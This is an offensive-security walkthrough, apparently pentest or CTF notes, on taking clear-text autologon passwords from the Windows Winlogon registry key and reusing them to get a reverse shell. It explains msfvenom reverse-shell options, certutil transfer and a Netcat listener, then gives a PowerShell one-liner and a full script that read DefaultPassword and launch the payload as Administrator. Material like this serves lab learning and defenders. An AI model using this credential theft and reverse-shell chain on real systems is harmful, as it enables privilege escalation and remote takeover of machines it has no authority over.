
# Autologon Credentials

![](/files/GqUfSj2LgU4p8hRh6x2u)

Windows autologon settings live in the Winlogon registry key (`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`, values `AutoAdminLogon`, `DefaultDomainName`, `DefaultUserName` and `DefaultPassword`), and the password is stored there in clear text, readable by any local user. If `DefaultPassword` is missing, the account may have been configured with Sysinternals Autologon, which keeps the password as an LSA secret instead (needs SYSTEM to read). Once recovered, the password is tried against every account we know of, not only the one it was stored for, since passwords are frequently reused.

We spray the recovered password with CrackMapExec (CME), psexec, runas or WinRM. Any user who is a member of the Remote Management Users group can be logged in over WinRM with evil-winrm.

![](/files/C9S3k5O8Swe9w8biMjZt)

![](/files/MR6HCkiM3NvWs8gnaZuH)

![](/files/j1Y7frWKIAc8fnWbenrW)

Since no remotely reachable service such as RDP or WinRM would let us log in as the Administrator user, the credentials are used on the box itself. PowerShell can build a System.Management.Automation.PSCredential object from a user name and password and hand it to Start-Process -Credential, which launches a script or binary as that user (this goes through the Secondary Logon service, seclogon, which must be running for the call to succeed). The clear-text password is wrapped in a SecureString when the credential object is built; that is not meaningful protection, since the password is still typed on the command line and is captured by process creation auditing with command-line logging (event 4688) and by PowerShell script block logging (event 4104).

Generate a reverse shell with msfvenom using the following flags:

* -p to specify the payload, in this case the Windows TCP reverse shell (windows/shell_reverse_tcp, or windows/x64/shell_reverse_tcp for a 64-bit target)
* LHOST to specify the attacker IP address the shell connects back to
* LPORT to specify the attacker port the shell connects back to
* -f to specify the output format, in this case exe

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-104.png?w=800\&ssl=1)

Using certutil on the victim and Python's built-in HTTP server (http.server) on the attacker to transfer the reverse shell to the victim machine:

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-105.png?w=800\&ssl=1)

The next step is to set up a Netcat listener on the attacker machine, which catches the reverse shell when the victim executes it, using the following flags:

* -l to listen for incoming connections
* -v for verbose output
* -n to skip the DNS lookup
* -p to specify the port to listen on

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-106.png?w=800\&ssl=1)

The following PowerShell command executes the reverse shell as the Administrator user if the credentials are correct. Note that the password is passed in clear text on the command line, so it is recorded by process creation auditing with command-line logging (event 4688) and by PowerShell script block logging (event 4104):

```
powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password); Start-Process -FilePath 'shell.exe' -Credential $creds"
```

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-107.png?w=800\&ssl=1)
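The following PowerShell script is added here as a worked example and is not code from the original page or from the referenced write-up. It ties the steps above together on the victim: it reads the Winlogon autologon values, builds the PSCredential, checks that the Secondary Logon service is running, proves the credentials work by writing `whoami /all` to a file, and only then launches the payload as that user. The payload path `C:\Users\Public\shell.exe`, the proof file name and the function names are assumptions for the example.

```powershell
# Added example (not the original page's code): recover Winlogon autologon
# credentials on the victim and use them to run a binary as that user.
# Assumption: the payload has already been dropped at C:\Users\Public\shell.exe.

function Get-AutologonCredential {
    # Winlogon stores autologon settings in clear text; the key is readable by any local user.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $key -ErrorAction Stop

    if ($p.AutoAdminLogon -ne '1') {
        Write-Warning "AutoAdminLogon is '$($p.AutoAdminLogon)'; the stored values may be stale but are still worth trying."
    }
    if ([string]::IsNullOrEmpty($p.DefaultPassword)) {
        # Sysinternals Autologon stores the password as the LSA secret 'DefaultPassword'
        # instead; reading that requires SYSTEM and is out of scope here.
        throw 'DefaultPassword is not present in the Winlogon key.'
    }

    # DOMAIN\user works for domain accounts and for local accounts (COMPUTERNAME\user).
    $account = if ($p.DefaultDomainName) { "$($p.DefaultDomainName)\$($p.DefaultUserName)" } else { $p.DefaultUserName }

    # ConvertTo-SecureString only wraps the string in memory. It does not protect the
    # password, which remains readable in this process and in script block logs.
    $secure = ConvertTo-SecureString -String $p.DefaultPassword -AsPlainText -Force
    New-Object System.Management.Automation.PSCredential($account, $secure)
}

function Test-SecondaryLogon {
    # Start-Process -Credential uses CreateProcessWithLogonW, which is serviced by the
    # Secondary Logon service. If it is stopped, the launch fails regardless of the password.
    $svc = Get-Service -Name seclogon -ErrorAction SilentlyContinue
    return ($null -ne $svc -and $svc.Status -eq 'Running')
}

function Invoke-AsAutologonUser {
    param(
        [Parameter(Mandatory)] [string] $FilePath,
        [string] $ArgumentList = ''
    )
    $cred = Get-AutologonCredential
    if (-not (Test-SecondaryLogon)) {
        throw 'Secondary Logon (seclogon) is not running; Start-Process -Credential will fail.'
    }
    # -WorkingDirectory must be a directory the target account can access. Inheriting the
    # caller's current directory (often another user's profile) produces the misleading
    # error "The directory name is invalid".
    $params = @{
        FilePath         = $FilePath
        Credential       = $cred
        WorkingDirectory = $env:PUBLIC
        PassThru         = $true
    }
    if ($ArgumentList) { $params.ArgumentList = $ArgumentList }
    Start-Process @params
}

# 1. Sanity check: write the effective identity to a file the target user can write to.
$proof = Join-Path $env:PUBLIC 'autologon-whoami.txt'   # assumed proof-file name
$proc = Invoke-AsAutologonUser -FilePath 'cmd.exe' -ArgumentList "/c whoami /all > `"$proof`""
$proc.WaitForExit()
Get-Content $proof | Select-Object -First 3

# 2. Run the reverse shell as that user (the Netcat listener must already be up on the attacker side).
Invoke-AsAutologonUser -FilePath 'C:\Users\Public\shell.exe' | Out-Null
```

The proof step is worth keeping even when the credentials are "obviously" right: it separates a wrong password from an environmental failure (stopped seclogon, inaccessible working directory, a payload blocked by AV), each of which otherwise surfaces as a vague Start-Process error.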
